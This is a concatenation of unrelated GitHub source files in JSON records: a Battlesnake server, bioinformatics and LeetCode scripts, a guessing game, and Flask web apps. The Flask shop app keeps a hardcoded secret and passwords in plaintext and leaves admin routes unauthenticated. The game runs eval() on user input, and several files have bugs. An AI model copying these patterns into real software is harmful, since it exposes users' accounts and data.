False\n else:\n return_several = True\n\n if not isinstance(labels, list):\n labels = [labels]\n\n label_tc = _gen_extract_label_time_course(stcs, labels, src, mode=mode,\n allow_empty=allow_empty)\n\n if not return_generator:\n # do the extraction and return a list\n label_tc = list(label_tc)\n\n if not return_several:\n # input was a single SoureEstimate, return single array\n label_tc = label_tc[0]\n\n return label_tc\n","repo_name":"soheilbr82/BluegrassWorkingMemory","sub_path":"Python_Engine/Lib/site-packages/mne/source_estimate.py","file_name":"source_estimate.py","file_ext":"py","file_size_in_byte":106955,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"17790686492","text":"import os\nimport random\n\nimport cherrypy\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\nclass Battlesnake(object):\n\t@cherrypy.expose\n\t@cherrypy.tools.json_out()\n\tdef index(self):\n\t\treturn {\n\t\t\t\"apiversion\": \"1\",\n\t\t\t\"author\": \"sinek\",\n\t\t\t\"color\": \"#888888\",\n\t\t\t\"head\": \"default\",\n\t\t\t\"tail\": \"default\",\n\t\t}\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef start(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(\"START\")\n\t\treturn \"ok\"\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef move(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(data)\n\n\t\t# Choose a random direction to move in\n\t\tpossible_moves = [\"up\", \"down\", \"left\", \"right\"]\n\t\tmove = random.choice(possible_moves)\n\n\t\tprint(f\"MOVE: {move}\")\n\t\treturn {\"move\": move}\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef end(self):\n\t\tdata = cherrypy.request.json\n\n\t\tprint(\"END\")\n\t\treturn \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n cherrypy.quickstart(server)\n","repo_name":"isinek/battle-snake-python","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19820197508","text":"\"\"\"Produces a fake refGene file for an artificial genome.\"\"\"\r\n\r\nimport re\r\n\r\nimport consts\r\nimport common\r\nfrom utils.datasets import DATASETS\r\n\r\n# Identifies a target sequence.\r\nTARGET_PATTERN = '([ACGT]{%d})[N]{%d}'\r\n# A template for an entry in a refGene file.\r\nREFGENE_LINE = (\r\n \"{idx}\\t{gene_name1}\\t{chr_name}\\t{strand}\\t\"\r\n \"{start}\\t{end}\\t{start}\\t{end}\\t1\\t{start},\\t{end},\\t\"\r\n \"0\\t{gene_name2}\\tcmpl\\tcmpl\\t0\\n\"\r\n)\r\n# Templates for gene names.\r\nGENE_NAME1 = \"NM_%d%08d\"\r\nGENE_NAME2 = \"NM_%d%05d\"\r\n\r\n\r\ndef get_args(raw_args):\r\n parser = common.default_parser(\r\n \"Produces a fake refGene file for an artificial genome.\")\r\n parser.add_argument(\r\n \"-r\", \"--refgene\", type=str, default=consts.REFGENE_FNAME,\r\n help=\"Name of output refGene file, with a single %%d for chr number\")\r\n parser.add_argument(\r\n \"-t\", \"--target_len\", type=int, default=consts.TARGET_LEN,\r\n help=\"Length of target sequences\")\r\n\r\n return parser.parse_args(raw_args)\r\n\r\n\r\ndef write_refgene(chrom, target_len, fd_out):\r\n \"\"\"Writes the contents of the refGene file.\r\n\r\n Args:\r\n chrom: A Chromosome instance.\r\n target_len: The length of target sequences.\r\n fd_out: A file descriptor for the output file.\r\n \"\"\"\r\n chr_name = chrom.get_name()\r\n # Reads the chromosome sequence.\r\n with open(chrom.get_path('txt'), 'r') as chr_file:\r\n genome = chr_file.read()\r\n\r\n # Identifies all the target sequences in the chromosome.\r\n matcher = re.compile(\r\n TARGET_PATTERN % (target_len, consts.NUM_N_BETWEEN_GUIDES))\r\n\r\n # Adds an entry for each target.\r\n for i, m in enumerate(matcher.finditer(genome)):\r\n idx = i+1\r\n gene_name1 = GENE_NAME1 % (chrom.num, idx)\r\n gene_name2 = GENE_NAME2 % (chrom.num, idx)\r\n strand = '+'\r\n start = m.start()\r\n end = start + target_len\r\n line = REFGENE_LINE.format(**locals())\r\n fd_out.write(line)\r\n\r\n\r\ndef main(raw_args=None):\r\n \"\"\"Produces a fake refGene file for an artificial genome.\r\n\r\n For command line help, run with the '-h' flag.\r\n\r\n Writes:\r\n A refGene file.\r\n \"\"\"\r\n args = get_args(raw_args)\r\n dataset = DATASETS[args.dataset]\r\n dataset.set_work_dir(args.path)\r\n chrom = dataset.get_chr(args.chr)\r\n\r\n out_path = chrom.get_refgene(args.refgene)\r\n with open(out_path, 'w') as fd_out:\r\n write_refgene(chrom, args.target_len, fd_out)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"sivan-bhaim/CrisprMethodCombinations","sub_path":"work_dir/scripts/prep/fake_refgene.py","file_name":"fake_refgene.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39279520230","text":"class LockingTree:\n\n def __init__(self, parent: List[int]):\n self.parent = parent\n self.graph = defaultdict(list)\n self.lock_history = [None] * len(parent)\n\n for child, p in enumerate(parent):\n self.graph[p].append(child)\n\n def lock(self, num: int, user: int) -> bool:\n if self.lock_history[num] == None:\n self.lock_history[num] = user\n return True\n return False\n \n\n def unlock(self, num: int, user: int) -> bool:\n if self.lock_history[num] == user:\n self.lock_history[num] = None\n return True\n return False\n\n\n def locked_ancestor_exists(self, node: int) -> bool:\n parent = self.parent[node]\n \n while parent != -1:\n if self.lock_history[parent] != None:\n return True\n parent = self.parent[parent]\n\n return False\n\n def locked_descendant_exists(self, node: int) -> bool:\n if self.lock_history[node] != None:\n return True\n\n for child in self.graph[node]:\n if self.locked_descendant_exists(child):\n return True \n\n return False\n\n def unlock_descendants(self, node: int) -> None:\n self.lock_history[node] = None\n for child in self.graph[node]:\n self.unlock_descendants(child)\n\n def upgrade(self, num: int, user: int) -> bool:\n if self.lock_history[num] != None:\n return False\n \n for child in self.graph[num]:\n if self.locked_descendant_exists(child):\n break\n else:\n return False\n \n if self.locked_ancestor_exists(num):\n return False\n\n self.unlock_descendants(num)\n self.lock_history[num] = user\n\n return True\n\n\n \n\n\n# Your LockingTree object will be instantiated and called as such:\n# obj = LockingTree(parent)\n# param_1 = obj.lock(num,user)\n# param_2 = obj.unlock(num,user)\n# param_3 = obj.upgrade(num,user)","repo_name":"Son-OfAnton/Leetcode","sub_path":"1993-operations-on-tree/1993-operations-on-tree.py","file_name":"1993-operations-on-tree.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71429925799","text":"from flask import Flask, render_template, request, redirect, url_for, session,flash\nfrom flask_mysqldb import MySQL\nfrom flask_wtf import FlaskForm\nfrom wtforms import *\nfrom flask_uploads import *\nfrom werkzeug.utils import secure_filename\nimport MySQLdb.cursors\nimport re\n\nUPLOAD_FOLDER = '/static/image'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\napp.secret_key = 'secret key'\n\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'gordon'\napp.config['MYSQL_PASSWORD'] = '123'\napp.config['MYSQL_DB'] = 'gamefun'\n\n\nmysql = MySQL(app)\n\n\n\nclass UpdateProductForm(Form):\n productName = StringField('', [validators.length(min=3, max=100)],\n render_kw={'placeholder': 'Product Name'})\n productDetail = StringField('', [validators.length(min=3, max=500)],\n render_kw={'placeholder': 'Detail'})\n productPrice = FloatField('', [validators.InputRequired()], \n render_kw={'placeholder': 'Price'})\n productCompany = StringField('', [validators.length(min=3, max=100)], \n render_kw={'placeholder': 'Product Company'})\n productPhoto = StringField('', [validators.length(min=3, max=100)], \n render_kw={'placeholder': 'Product Link'})\n\n \n\n\n@app.route('/')\ndef index():\n\treturn render_template('MainPage.html')\n\n\n@app.route('/news')\ndef news():\n\treturn render_template('news.html')\n\n@app.route('/product')\ndef product():\n\n\tproducttypea = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\tgtype = 'PS4'\n\tproducttypea.execute(\"SELECT * FROM Products WHERE productCompany = %s ORDER BY RAND()\", (gtype,))\n\tPS4 = producttypea.fetchall()\n\n\tproducttypeb = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\tgtype = 'NS'\n\tproducttypeb.execute(\"SELECT * FROM Products WHERE productCompany = %s ORDER BY RAND()\", (gtype,))\n\tNS = producttypeb.fetchall()\n\n \n\treturn render_template('product.html', PS4 =PS4, NS=NS)\n\n@app.route('/productDetail', methods=[\"POST\",\"GET\"])\ndef proDetail():\n if 'productID' in request.args:\n productID = request.args['productID']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM Products WHERE productID = %s',(productID,))\n mysql.connection.commit()\n detail = cursor.fetchall()\n\n return render_template('proDetail.html', detail = detail)\n return render_template('proDetail.html')\n\n\n@app.route('/order', methods=['POST',\"GET\"])\ndef order():\n if 'loggedin' in session:\n if 'productID' in request.args:\n productID = request.args['productID']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM Products WHERE productID = %s',(productID,))\n mysql.connection.commit()\n detail = cursor.fetchall()\n\n return render_template('order.html', detail = detail)\n return render_template('order.html')\n else:\n flash('Please login your account')\n return render_template('Login.html')\n\n\n@app.route('/confirmOrder',methods=[\"POST\",\"GET\"])\ndef confirmOrder():\n\n if request.method == 'POST' and 'orderName' in request.form and 'ProductID' in request.form and 'orderAddress' in request.form and 'orderPhone' in request.form:\n \n orderName = request.form['orderName']\n ProductID = request.form['ProductID']\n orderAddress = request.form['orderAddress']\n orderPhone = request.form['orderPhone']\n orderEmail = request.form['orderEmail']\n \n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor) \n submit = cursor.execute('INSERT INTO orderlist VALUES (NULL, %s, %s,%s, %s, %s)', (orderName,ProductID,orderAddress,orderPhone, orderEmail))\n mysql.connection.commit()\n \n if submit:\n flash('Order Submitted', 'success')\n return render_template('MainPage.html', submit = submit )\n \n else:\n flash('Order Not Submit', 'danger') \n return render_template('order.html', submit = submit )\n\n return render_template('confirmOrder.html')\n \n \n \n \n \n \n\n@app.route(\"/vieworder\" , methods=['GET', 'POST'])\ndef viewallorder():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM orderlist \")\n viewallorder = cursor.fetchall()\n return render_template ('vieworder.html' ,viewallorder = viewallorder)\n\n@app.route(\"/deleteorder\" , methods=['GET', 'POST'])\ndef deleteproduct():\n if 'orderID' in request.args:\n orderID = request.args['orderID']\n cursor = mysql.connection.cursor()\n deleted = cursor.execute(\"DELETE FROM orderlist where orderID=%s\", (orderID,))\n mysql.connection.commit()\n if deleted:\n flash('Order has been deleted')\n return render_template('vieworder.html')\n \n return redirect(url_for('vieworder.html'))\n\n\n \n\n@app.route('/CustomerService', methods=['GET', 'POST'])\ndef customerService():\n\n\tif request.method =='POST':\n\t\tname = request.form['name']\n\t\tphoneNumber = request.form['phonenumber']\n\t\temail = request.form['email']\n\t\tproblemD = request.form['question']\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('INSERT INTO questions VALUES (NULL, %s, %s,%s, %s)', (name,phoneNumber,email,problemD))\n\t\tmysql.connection.commit()\n\t\treturn render_template('FormSent.html')\n\telse:\n\t\treturn render_template('CustSer.html')\n\n@app.route('/About')\ndef About():\n\treturn render_template('About.html')\n\n@app.route('/profile')\ndef profile():\n \n if 'loggedin' in session:\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE id = %s', (session['id'],))\n user = cursor.fetchone()\n \n return render_template('profile.html', users=user)\n \n return redirect(url_for('login'))\n\n@app.route('/adminprofile')\ndef adminprofile():\n\n\tif 'adminloggedin' in session:\n\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('SELECT * FROM admin WHERE adminID = %s', (session['adminID'],))\n\t\tadmin = cursor.fetchone()\n\n\t\treturn render_template('adminProfile.html')\n\treturn redirect(url_for('adminlogin.html'))\n\n\n@app.route(\"/listalluser\" , methods=['GET', 'POST'])\ndef listalluser():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM users \")\n listalluser = cursor.fetchall()\n return render_template ('listuser.html' ,listalluser = listalluser)\n\n@app.route(\"/listallproduct\" , methods=['GET', 'POST'])\ndef listallproduct():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM Products\")\n listallproduct = cursor.fetchall()\n return render_template('listallproduct.html', listallproduct = listallproduct)\n\n\n@app.route(\"/editproduct\" , methods=['GET', 'POST'])\ndef editproduct():\n if 'productID' in request.args:\n form = UpdateProductForm(request.form)\n productID = request.args['productID']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM Products WHERE productID=%s\", (productID))\n result = cursor.fetchone()\n\n if request.method == 'POST' and 'productName' in request.form and 'productDetail' in request.form and 'productPrice' in request.form and 'productCompany' in request.form and 'productPhoto' in request.form:\n productName = form.productName.data\n productDetail = form.productDetail.data\n productPrice = form.productPrice.data\n productCompany = form.productCompany.data\n productPhoto = form.productPhoto.data\n\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n update = cursor.execute(\"UPDATE Products SET productName=%s,productDetail=%s, productPrice=%s, productCompany=%s , productPhoto=%s WHERE productID=%s\",\n ( productName,productDetail,productPrice,productCompany,productPhoto,productID))\n mysql.connection.commit()\n\n if update:\n flash('info updated', 'success')\n return render_template('editproduct.html', result= result, form=form , )\n else:\n flash('info not updated', 'danger')\n return render_template('editproduct.html',result= result, form=form, )\n\n return render_template('editproduct.html', result= result, form=form, )\n return render_template('editproduct.html')\n\n@app.route(\"/deleteproduct\" , methods=['GET', 'POST'])\ndef deleteP():\n if 'productID' in request.args:\n productID = request.args['productID']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"DELETE FROM Products where productID = %s\", (productID,))\n mysql.connection.commit()\n if deleted:\n flash('Product has been deleted')\n return render_template('listallproduct.html' ,deleted = deleted)\n \n return render_template('listallproduct.html')\n\n\n@app.route(\"/productUpload\" , methods=['GET', 'POST']) \ndef uploadproduct():\n \n if request.method == 'POST' and 'productName' in request.form and 'productDetail' in request.form and 'productPrice' in request.form and 'productCompany' in request.form and 'productPhoto' in request.form : \n productName = request.form['productName']\n productDetail = request.form['productDetail']\n productPrice = request.form['productPrice']\n productCompany = request.form['productCompany']\n productPhoto = request.form['productPhoto']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"INSERT INTO Products ( productName, productDetail, productPrice, productCompany, productPhoto) VALUES(%s, %s, %s, %s, %s)\",( productName, productDetail, productPrice, productCompany, productPhoto))\n mysql.connection.commit()\n \n \n return render_template ('uploadproduct.html')\n\n@app.route(\"/viewquestion\" , methods=['GET', 'POST'])\ndef viewquestion():\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT * FROM questions\")\n viewquestion = cursor.fetchall()\n return render_template('viewquestion.html', viewquestion = viewquestion)\n\n@app.route(\"/deletequestion\" , methods=['GET', 'POST'])\ndef deletequestion():\n if 'questionID' in request.args:\n questionID = request.args['questionID']\n cursor = mysql.connection.cursor()\n deleted = cursor.execute(\"DELETE FROM questions where questionID=%s\", (questionID,))\n mysql.connection.commit()\n if deleted:\n flash('question has been deleted')\n return render_template('viewquestion.html', deleted = deleted)\n return render_template('viewquestion.html')\n\n\n@app.route('/adminhome')\ndef adminhome():\n\treturn render_template('adminHome.html')\n\n\n\n@app.route('/adminLogin' , methods=['GET', 'POST'])\ndef adminLogin():\n\tmsg =''\n\tif request.method =='POST' and 'adminName' in request.form and 'adminPassword' in request.form:\n\n\t\tadminName = request.form['adminName']\n\t\tadminPassword = request.form['adminPassword']\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('SELECT * FROM admin WHERE adminName = %s AND adminPassword= %s', (adminName, adminPassword))\n\n\t\tadmin = cursor.fetchone()\n\t\tif admin:\n\t\t\tsession['adminloggedin'] = True\n\t\t\tsession['adminID'] = admin['adminID']\n\t\t\tsession['adminName'] = admin['adminName']\n\t\t\tsession['adminPassword'] = admin['adminPassword']\n\t\t\tsession['adminEmail'] = admin['adminEmail']\n\n\t\t\treturn render_template('adminHome.html')\n\t\telse:\n\t\t\tmsg = 'Incorrect username/password'\n\n\treturn render_template('adminlogin.html')\n\n@app.route('/gamefun/adminlogout')\ndef adminlogout():\n \n session.pop('adminloggedin', None)\n session.pop('adminID', None)\n session.pop('adminName', None)\n\n return redirect(url_for('adminhome'))\n\n\n\n@app.route('/Login/', methods=['GET', 'POST'])\ndef login():\n \n msg = ''\n \n if request.method == 'POST' and 'username' in request.form and 'password' in request.form:\n \n username = request.form['username']\n password = request.form['password']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE username = %s AND password = %s', (username, password,))\n \n user = cursor.fetchone()\n \n if user:\n \n session['loggedin'] = True\n session['id'] = user['id']\n session['username'] = user['username']\n \n return render_template('LoginS.html')\n else:\n \n msg = 'Incorrect username/password!'\n \n return render_template('Login.html', msg=msg)\n\n \n@app.route('/gamefun/logout')\ndef logout():\n \n session.pop('loggedin', None)\n session.pop('id', None)\n session.pop('username', None)\n \n return redirect(url_for('login'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \n msg = ''\n \n if request.method == 'POST' and 'username' in request.form and 'password' in request.form and 'email' in request.form:\n \n username = request.form['username']\n password = request.form['password']\n email = request.form['email']\n \n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('SELECT * FROM users WHERE username = %s', (username,))\n user = cursor.fetchone()\n \n if user:\n msg = 'Account already exists!'\n elif not re.match(r'[^@]+@[^@]+\\.[^@]+', email):\n msg = 'Invalid email address!'\n elif not re.match(r'[A-Za-z0-9]+', username):\n msg = 'Username must contain only characters and numbers!'\n elif not username or not password or not email:\n msg = 'Please fill out the form!'\n else:\n \n cursor.execute('INSERT INTO users VALUES (NULL, %s, %s, %s)', (username, password, email,))\n mysql.connection.commit()\n return render_template('RegistS.html')\n elif request.method == 'POST':\n \n msg = 'Please fill out the form!'\n \n return render_template('Register.html', msg=msg)\n\n\n\n\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","repo_name":"tsunwang9455/205CDE","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70919851240","text":"filename = \"day_2_input.txt\"\ntotal_score_1 = 0\ntotal_score_2 = 0\n\ndef round_score_1(line):\n opp, self = line.split()\n shape_score = ord(self) - ord(\"X\") + 1\n winner_score = ((ord(self) - ord(opp)) % 3 == 0) * 6 + ((ord(self) - ord(opp)) % 3 == 2) * 3\n return shape_score + winner_score\n\ndef round_score_2(line):\n opp, result = line.split()\n shape_score = ((ord(opp) + ord(result) - 128) % 3 == 0) * 2 + ((ord(opp) + ord(result) - 128) % 3 == 1) * 3 + ((ord(opp) + ord(result) - 128) % 3 == 2) * 1\n winner_score = (ord(result) - ord(\"X\")) * 3\n return shape_score + winner_score\n\nwith open(filename) as f:\n for line in f:\n if not len(line.strip()) == 0:\n total_score_1 += round_score_1(line)\n total_score_2 += round_score_2(line)\n\nprint(total_score_1, total_score_2)","repo_name":"neunzehnhundert97/AoC2022","sub_path":"Python/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41952605510","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTests the TSM procedures on real data.\n\"\"\"\n\nimport os\nimport shutil\nimport pytest\n\nfrom audiotsm import ola, wsola, phasevocoder, PhaseLocking\nfrom audiotsm.io.wav import WavReader, WavWriter\nfrom audiotsm.io.array import ArrayWriter\n\nEXAMPLES_DIR = os.path.join(\"build\", \"ghpages\", \"examples\")\n\n\ndef create_tsm(name, channels, speed):\n \"\"\"Create a TSM object given the method name and its parameters.\"\"\"\n if name == \"ola\":\n return ola(channels, speed)\n if name == \"wsola\":\n return wsola(channels, speed)\n if name == \"phasevocoder\":\n return phasevocoder(channels, speed, phase_locking=PhaseLocking.NONE)\n if name == \"phasevocoder_identity\":\n return phasevocoder(channels, speed,\n phase_locking=PhaseLocking.IDENTITY)\n\n raise ValueError(\"unknown TSM method: {}\".format(name))\n\n\ndef test_data(data_file, speed, tsm_name, save):\n \"\"\"Test the TSM procedures on real data.\"\"\"\n reader = None\n writer = None\n\n try:\n # Create the reader\n reader = WavReader(data_file)\n\n # Create the writer\n if save:\n # pylint: disable=no-member\n rel_path = os.path.relpath(data_file, pytest.DATA_DIR)\n # pylint: enable=no-member\n\n # Copy original file to \"orig\" directory\n orig_file = os.path.join(EXAMPLES_DIR, \"orig\", rel_path)\n orig_dir = os.path.dirname(orig_file)\n if not os.path.isdir(orig_dir):\n os.makedirs(orig_dir)\n if not os.path.isfile(orig_file):\n shutil.copy2(data_file, orig_file)\n\n # Generate output file path\n speed_dir = \"speed-{:.2f}\".format(speed)\n name = os.path.splitext(rel_path)[0]\n output_name = \"{}_{}.wav\".format(name, tsm_name)\n output_file = os.path.join(EXAMPLES_DIR, speed_dir, output_name)\n output_dir = os.path.dirname(output_file)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n writer = WavWriter(output_file, reader.channels, reader.samplerate)\n else:\n writer = ArrayWriter(reader.channels)\n\n # Create and run the TSM\n tsm = create_tsm(tsm_name, reader.channels, speed)\n tsm.run(reader, writer)\n\n finally:\n # Close files\n if reader:\n reader.close()\n if save and writer:\n writer.close()\n","repo_name":"Muges/audiotsm","sub_path":"tests/integration/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"18"} +{"seq_id":"31238254730","text":"#!/usr/bin/env python3\nimport random\nimport os.path\ntries = 0;\nn = random.randint(0,100)\nprint(n)\noldTries = [] \ndef playAgain():\n global tries\n global n\n tries=0\n n = random.randint(0,100)\n print(n)\n \n oldTries.clear() \ndef playGame():\n global tries\n x = -1\n while True:\n if(tries < 10):\n try:\n x = eval(input('Enter a number between 0 and 100'))\n except:\n print(\"invalid choice\")\n if (x<0 or x > 100):\n print(\"please enter only numbers between 0 and 10\")\n else:\n if(x==n):\n print(\"Congratulation your answer is correct\")\n saveResult(\"won\")\n playAgain();\n \n elif x in oldTries:\n print(\" you have tried this before\") \n elif(x>n):\n print(\"a smaller number\")\n oldTries.append(x)\n tries = tries+1\n elif(x\")\nclass Item(MethodView):\n ## this is the default code of response\n ##and will pass whatever be the return\n ##to ItemSchmea\n @jwt_required()\n @blp.response(200, ItemSchema)\n def get(self, item_id):\n ##this i only avaliable with flask sqlarchemy, with vanilla alchemy we will have to find other way\n ##get or 404 use the primary key to search\n item = ItemModel.query.get_or_404(item_id)\n return item\n\n @jwt_required()\n def delete(self, item_id):\n jwt = get_jwt()\n if not jwt.get(\"is_admin\"):\n abort(401, message= \"Admin privilege required\")\n item = ItemModel.query.get_or_404(item_id)\n db.session.delete(item)\n db.session.commit()\n return {\"message\":\"Item has been delted\"}, 200\n \n @jwt_required()\n ## this is all the implementation needed to \n ##implement security via jwt to a spcifid endpoint\n ## as defaul on header must go \n ## Autorization Bearer $JWT\n ##Bearer means \"Portador\"\n ##Bearer is like a convention\n @blp.arguments(ItemUpdateSchema)\n ##To inject arguments into a view function, use the Blueprint.arguments decorator. It allows to specify a Schema to deserialize and validate the parameters.\n##When processing a request, the input data is deserialized, validated, and injected in the view function.\n ##orden of decorator matter\n @blp.response(200, ItemSchema)\n ##put request should have the same state at the end independly if we receive one o ten time the request\n ##ieg if a user push multiple times a button of send by mistake two times the same request\n def put(self,item_data, item_id ):\n item = ItemModel.query.get(item_id)\n ## item will be true if item exists \n if item:\n item.price = item_data[\"price\"]\n item.name = item_data[\"name\"]\n else:\n item = ItemModel(id=item_id, **item_data)\n\n db.session.add(item)\n db.session.commit()\n\n raise NotImplementedError(\"Updating an item is not implemented.\")\n\n @blp.route(\"/item\")\n class ItemList(MethodView):\n ##with many=True it auto convert response into a list\n @blp.response(200, ItemSchema(many=True))\n def get(self):\n return ItemModel.query.all()\n\n ##this will require a jwt of type fresh to perform the operation\n @jwt_required(fresh=True)\n\n ##with this we pass to validation\n ##with marshmallow\n @blp.arguments(ItemSchema)\n ## here the second argument is the json\n ##that pass the validation\n @blp.response(201, ItemSchema)\n def post(self, item_data):\n ##** allow us to unpack all arguments paxsed as named arguments\n item = ItemModel(**item_data)\n ##when we create a item id field will hav eno value\n ##until we insert it on db\n\n try:\n ##add dont writte direct into de db but stage data\n db.session.add(item)\n ##commit writte in db\n db.session.commit()\n except SQLAlchemyError:\n abort(500, message= \"An error ocurred while inseting the item.\")\n \n return item","repo_name":"Ryss-D/flask","sub_path":"restAPI/resources/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40774235555","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-07-29 17:44:41\n# @Last Modified : 2020-07-29 17:44:41\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 给定一幅由黑色像素和白色像素组成的图像, 与一个正整数N, 找到位于某行 R 和某列 C 中且符合下列规则的黑色像素的数量: \n# \n# \n# 行R 和列C都恰好包括N个黑色像素。 \n# 列C中所有黑色像素所在的行必须和行R完全相同。 \n# \n# \n# 图像由一个由‘B’和‘W’组成二维字符数组表示, ‘B’和‘W’分别代表黑色像素和白色像素。 \n# \n# 示例: \n# \n# 输入: \n# [['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'B', 'W', 'B', 'B', 'W'], \n# ['W', 'W', 'B', 'W', 'B', 'W']] \n# \n# N = 3\n# 输出: 6\n# 解析: 所有粗体的'B'都是我们所求的像素(第1列和第3列的所有'B').\n# 0 1 2 3 4 5 列号 \n# \n# 0 [['W', 'B', 'W', 'B', 'B', 'W'], \n# 1 ['W', 'B', 'W', 'B', 'B', 'W'], \n# 2 ['W', 'B', 'W', 'B', 'B', 'W'], \n# 3 ['W', 'W', 'B', 'W', 'B', 'W']] \n# 行号\n# \n# 以R = 0行和C = 1列的'B'为例:\n# 规则 1,R = 0行和C = 1列都恰好有N = 3个黑色像素. \n# 规则 2,在C = 1列的黑色像素分别位于0,1和2行。它们都和R = 0行完全相同。\n# \n# \n# \n# \n# \n# 注意: \n# \n# \n# 输入二维数组行和列的范围是 [1,200]。 \n# \n# \n# \n# Related Topics 深度优先搜索 数组 \n# 👍 8 👎 0\n\n\"\"\"\n\nimport collections\nfrom typing import List\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def findBlackPixel(self, picture: List[List[str]], N: int) -> int:\n \"\"\"题意太费解\"\"\"\n R, C = len(picture), len(picture[0])\n rows, cols = [0] * R, [0] * C\n lookup = collections.defaultdict(int)\n for i in range(R):\n for j in range(C):\n if picture[i][j] == 'B':\n rows[i] += 1\n cols[j] += 1\n lookup[tuple(picture[i])] += 1\n # print(rows,cols,lookup)\n result = 0\n for i in range(R):\n if rows[i] == N and lookup[tuple(picture[i])] == N:\n for j in range(C):\n result += picture[i][j] == 'B' and cols[j] == N\n return result\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\n@pytest.mark.parametrize(\"kw,expected\", [\n [dict(\n picture=[['W', 'B', 'W', 'B', 'B', 'W'],\n ['W', 'B', 'W', 'B', 'B', 'W'],\n ['W', 'B', 'W', 'B', 'B', 'W'],\n ['W', 'W', 'B', 'W', 'B', 'W']],\n N=3\n ), 6],\n\n])\ndef test_solutions(kw, expected):\n assert Solution().findBlackPixel(**kw) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0533_lonely-pixel-ii.py","file_name":"0533_lonely-pixel-ii.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30036481944","text":"#!/usr/bin/env python3\n\n'''\nBasic IPv4 router (static routing) in Python.\n'''\n\nimport sys\nimport os\nimport time\nfrom switchyard.lib.userlib import *\n\n\n\nclass Router(object):\n def __init__(self, net):\n self.net = net\n # other initialization 